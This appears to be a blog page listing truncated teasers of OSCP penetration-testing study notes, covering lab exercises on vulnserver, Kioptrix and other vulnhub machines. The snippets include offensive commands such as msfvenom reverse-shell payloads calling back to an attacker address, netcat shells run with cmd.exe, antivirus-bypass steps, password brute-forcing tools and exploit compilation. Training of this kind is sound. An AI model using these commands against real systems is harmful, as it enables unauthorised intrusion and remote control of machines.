More articles related to "OSCP Learning Notes - Exploit(6)"

Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social-Engineering Attacks 3. Select 2) Website Attack Vectors. 4. Select 2) Metasploit Browser Exploit Method 5. Select 2) Site Cloner and set the options. 6. S…
Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ #!/usr/bin/python import socket import os import sys host="192.168.2.135"…
Compiling an Exploit Exercise: samba exploit 1. Search and download the samba exploit source code from Exploit Database. https://www.exploit-db.com/exploits/10 2. Compile the source code. gcc 10.c -o trans2open 3. Use the trans2open tool to exploit t…
Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptrix nmap 10.0.0.0/24 -n -sP -sn 2. Scan the Kioptrix server and analyze the result. nmap -nvv -Pn -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN…
Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2. Search ssh related modules. 3. Use the "auxiliary/scanner/ssh/ssh_login" module and set the options, such as pass_file, rhosts, username. 4. Exploit the target.…
Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FIL…
Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options] {target and service specification}TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.…
Antivirus Bypassing Tools: Kali Linux Detection Platform: https://www.virustotal.com/gui/home/upload 1. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT= -f exe -o shell1.exe 2. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT…
Java Applet Attacks Download virtual machines from the following website: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 1. Reset the IE Internet Security Level to Medium and Local intranet to Low 2. Add the target url to the excepti…
Finding the Offset 1. Use the Metasploit pattern_create.rb tool to create 5900 characters. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 2. Write the python test script. The shellcode is copied from the previous step. #!/usr…
SMB Enumeration 1. Set the smb configurations. locate smb.conf vim /etc/samba/smb.conf Insert the global settings to the configuration file. client use spnego = no client ntlmv2 auth = no 2. Enumerate the target computer and find some interesting th…
Installing Kioptrix: Level 1 Download the VM from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. In the Kali Linux: Find the devices in the intranet using the following command: netdiscover -i eth0 Scan the target Kioptrix VM through n…
Scanning with Metasploit: 1. Start Metasploit using msfconsole 2. Search modules 3. Choose one of the modules using command: use + module name 4. Show the module options 5. Set the module options 6. Start the exploit: run or exploit…
Common Tools Google Exploit-DB/Google Hacking DB WHOIS Netcraft theharvester Example: Google search: site:cnn.com -site:www.cnn.com filetype:pdf More Google search syntax can be found on the site: https://support.google.com/websearch/answer/2466433…
Generating Shellcode & Gaining Root 1. Generate the shellcode on Kali Linux. LHOST is the IP of Kali Linux. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.XXX LPORT=4444 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00" 2. Write th…
SickOS 1.2 Walkthrough Preparation: Download the SickOS virtual machine from the following website: https://www.vulnhub.com/entry/sickos-12,144/ 1. Scan the network to find the IP of the SickOS server. The IP address of SickOS is 10.0.0.31. netdisc…
DroopyCTF Walkthrough Preparation: Download the DroopyCTF virtual machine from the following website: https://www.vulnhub.com/entry/droopy-v02,143/ 1. Scan the network to find the IP address of the DroopyCTF server. netdiscover -r 10.0.0.0/ 2. Scan t…
BTRSys v2.1 Walkthrough Preparation: Download the BTRSys virtual machine from the following website: https://www.vulnhub.com/entry/btrsys-v21,196/ 1. Find the IP address of the BTRSys virtual machine. netdiscover -r 10.0.0.0/ 2. Perform the TCP/UDP s…
Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine from the following website: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ The target server: Kioptrix Level 1.1 (#2) 1. Discover the IP address of the target server. We…
Pivoting 1. Edit the virtual network settings of VMware. 2. Set the Network Adapter(s) of Kali Linux, IE8-Win7 and Kioptrix Level 1 as shown in the following screenshots. The Kali Linux should only talk to the IE8-Win7 machine, and cannot talk to…
Linux Post Exploitation Target Server: Kioptrix Level 1 1. Search the payload types. msfvenom -l payloads All the payload types in Metasploit are shown below: Framework Payloads ( total) [--payload <value>] ======================================…
Privilege Escalation Download the Basic-pentesting virtual machine from the following website: https://www.vulnhub.com/entry/basic-pentesting-1,216/ 1. Scan the target server using nmap. nmap -Pn -sS --stats-every 3m --max-scan-delay --defeat-rst-ratelim…
Metasploit Target Server: Kioptrix Level 1 (1) Start Metasploit on Kali Linux. (2) Set the module and options. search trans2open use exploit/linux/samba/trans2open set RHOST 10.0.0.13 show options exploit (3) Exploit the Kioptrix Level 1 server. (F…
File transfer types: 1. HTTP Transfer files through the website. 2. wget wget http://10.0.0.109/exploit.php 3. FTP python FTP (1) Install python FTP on the Kali Linux. pip3 install pyftpdlib (2) Move to the target folder, and start the FTP service. python…
Remote File Inclusion [RFI] Prepare: Download DVWA from the following website and deploy it on your server. http://www.dvwa.co.uk/ Install XAMPP and DVWA: 1. Install XAMPP on a Windows server, and change the Apache HTTP port to 82 and the SSL port to 44…
Finding Bad Characters 1. Find the bad characters using the following website: https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/ 2. Write the Python test script using the badchars. #!/usr/bin/python import socket import…
Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver Immunity Debugger - https://www.immunityinc.com/products/debugger/ Vulnserver Test 1. Open the vulnserver…
Introduction to Netcat Connecting vs. Listening Bind Shells Attacker connects to victim on listening port Reverse Shells Victim connects to attacker on listening port Basic usage: nc -nv IP Port Bind Shell: 1. On the Windows nc tool. -nvlp -e cmd.exe 2…
DNS Enumeration 1. Host Tool host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command line arguments a…
HTTP Enumeration Target Host IP: 10.0.0.20 Brute Forcing using DirBuster 1. Start DirBuster and set the options. Note: 1. The wordlist can be found locally or downloaded from the Internet. OR Dirbuster-ng big wordlist download site: https://github…